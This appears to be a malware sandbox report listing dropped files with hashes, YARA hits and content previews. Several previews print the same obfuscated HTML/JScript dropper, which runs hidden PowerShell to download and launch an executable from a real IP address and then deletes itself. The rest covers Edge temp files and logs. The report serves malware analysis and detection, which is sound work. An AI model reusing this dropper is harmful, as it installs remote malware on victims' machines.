                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):956
                                                                                                                                                                                                                                                    Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                                                    MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                                                    SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                                                    SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                                                    SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

                                                                                                                                                                                                                                                    C:\Temp\3GEgnMlRi.gif (copy)

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):956
                                                                                                                                                                                                                                                    Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                                                    MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                                                    SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                                                    SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                                                    SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

                                                                                                                                                                                                                                                    C:\Temp\3GEgnMlRi.txt

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):956
                                                                                                                                                                                                                                                    Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                                                    MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                                                    SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                                                    SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                                                    SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\3GEgnMlRi.txt, Author: Joe Security
                                                                                                                                                                                                                                                    Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

                                                                                                                                                                                                                                                    C:\Temp\5ZycQXqae.gif (copy)

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):956
                                                                                                                                                                                                                                                    Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                                                    MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                                                    SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                                                    SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                                                    SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

                                                                                                                                                                                                                                                    C:\Temp\5ZycQXqae.txt

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):956
                                                                                                                                                                                                                                                    Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                                                    MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                                                    SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                                                    SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                                                    SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\5ZycQXqae.txt, Author: Joe Security
                                                                                                                                                                                                                                                    Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cbfb8a9c89.exe.log

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe
                                                                                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                    Size (bytes):1058
                                                                                                                                                                                                                                                    Entropy (8bit):5.356262093008712
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                                                                                                                                                                                                                                    MD5:B2EFBF032531DD2913F648E75696B0FD
                                                                                                                                                                                                                                                    SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                                                                                                                                                                                                                                    SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                                                                                                                                                                                                                                    SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4a1eb682-82ef-4403-b723-5e3abc1a3fb5.tmp

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                    Size (bytes):57863
                                                                                                                                                                                                                                                    Entropy (8bit):6.105228577252102
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kMYyrWoBJ1ZUA93Vp4lTcfAIra8O5jH5iyPP4rLtyR/:z/Ps+wsI7yn6J1HlKxL41j0RGoD
                                                                                                                                                                                                                                                    MD5:DCF13ED381F96306EB5B29E0A66E7A95
                                                                                                                                                                                                                                                    SHA1:86C8CF2EC194E8955EE9497E83F3974A9E75D279
                                                                                                                                                                                                                                                    SHA-256:C9D1771B998059378E6F22D0B99D368E9DE90640C39C90880D8AF38104C8AB90
                                                                                                                                                                                                                                                    SHA-512:0F8C87245ED93049BE05C03C8A84914BFDDD47F1B85076DC1E7EFD81D8C65248D0A01479B3946E20C418127DFB18AEC10315F8C1E6E8215C225E65F87E929192
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4f3a3a19-5553-4b84-a3d1-1e4437a6b3a2.tmp

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):57887
                                                                                                                                                                                                                                                    Entropy (8bit):6.105099540783665
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k6YyrWoBJrZUA93Vp4lTcfAIra8vxlxXo7SWLb4rLtE:z/Ps+wsI7yn4JrHlKxH41j0RGoD
                                                                                                                                                                                                                                                    MD5:4458F582E2126F4592516F55317DD707
                                                                                                                                                                                                                                                    SHA1:88C946B98F86356248BAD6EE82B55F01D63D6BED
                                                                                                                                                                                                                                                    SHA-256:05EC7C049557B87F4E984AE03DDFF545616A531F0883BD469995107BA9818066
                                                                                                                                                                                                                                                    SHA-512:C43D70FA819BAD1AD49CACEF4FB3DF30F8145E75BE898828197DEF9C7058660BFCFE90CDCC06EDF6BDE3AD026B81243A330FFA86411633C15CF327B476DD08FD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\88563cad-e93e-4811-87b2-de94abf9569c.tmp

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):57863
                                                                                                                                                                                                                                                    Entropy (8bit):6.105228577252102
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kMYyrWoBJ1ZUA93Vp4lTcfAIra8O5jH5iyPP4rLtyR/:z/Ps+wsI7yn6J1HlKxL41j0RGoD
                                                                                                                                                                                                                                                    MD5:DCF13ED381F96306EB5B29E0A66E7A95
                                                                                                                                                                                                                                                    SHA1:86C8CF2EC194E8955EE9497E83F3974A9E75D279
                                                                                                                                                                                                                                                    SHA-256:C9D1771B998059378E6F22D0B99D368E9DE90640C39C90880D8AF38104C8AB90
                                                                                                                                                                                                                                                    SHA-512:0F8C87245ED93049BE05C03C8A84914BFDDD47F1B85076DC1E7EFD81D8C65248D0A01479B3946E20C418127DFB18AEC10315F8C1E6E8215C225E65F87E929192
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9cdb6b1f-84ae-4efd-8b3f-15fb3cc918cf.tmp

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                    Size (bytes):57887
                                                                                                                                                                                                                                                    Entropy (8bit):6.105099540783665
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k6YyrWoBJrZUA93Vp4lTcfAIra8vxlxXo7SWLb4rLtE:z/Ps+wsI7yn4JrHlKxH41j0RGoD
                                                                                                                                                                                                                                                    MD5:4458F582E2126F4592516F55317DD707
                                                                                                                                                                                                                                                    SHA1:88C946B98F86356248BAD6EE82B55F01D63D6BED
                                                                                                                                                                                                                                                    SHA-256:05EC7C049557B87F4E984AE03DDFF545616A531F0883BD469995107BA9818066
                                                                                                                                                                                                                                                    SHA-512:C43D70FA819BAD1AD49CACEF4FB3DF30F8145E75BE898828197DEF9C7058660BFCFE90CDCC06EDF6BDE3AD026B81243A330FFA86411633C15CF327B476DD08FD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677402E5-F0C.pma

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                    Entropy (8bit):0.04757917705623246
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:UaWlD0pqtm7nOAxJVTJ/EdxeQR0JVFg8XVWIWhkHZBzhEhNGMv+RQ8TfSsWn8y0d:alD0ct0ft6tIhcxmvSsW08T2RGOD
                                                                                                                                                                                                                                                    MD5:933FBAC3B2A3D3FC8F8CB1823250DB02
                                                                                                                                                                                                                                                    SHA1:997120EC0D4FED961C499C0BC06DA7061E508097
                                                                                                                                                                                                                                                    SHA-256:A501536405356C29E12B30997499F3D5FFB21C3EC764C2801796C4E0CFDDFCC4
                                                                                                                                                                                                                                                    SHA-512:5A4E4B5CDD6836625E27CD574589759AF2E6F49ABBC0E42FB0A6499CD7F620A67FA1B478F2FD6CCD35E82464A5C766FF2AA9A4E9B953271A306D46A386571D4D
                                                                                                                                                                                                                                                    Malicious:false
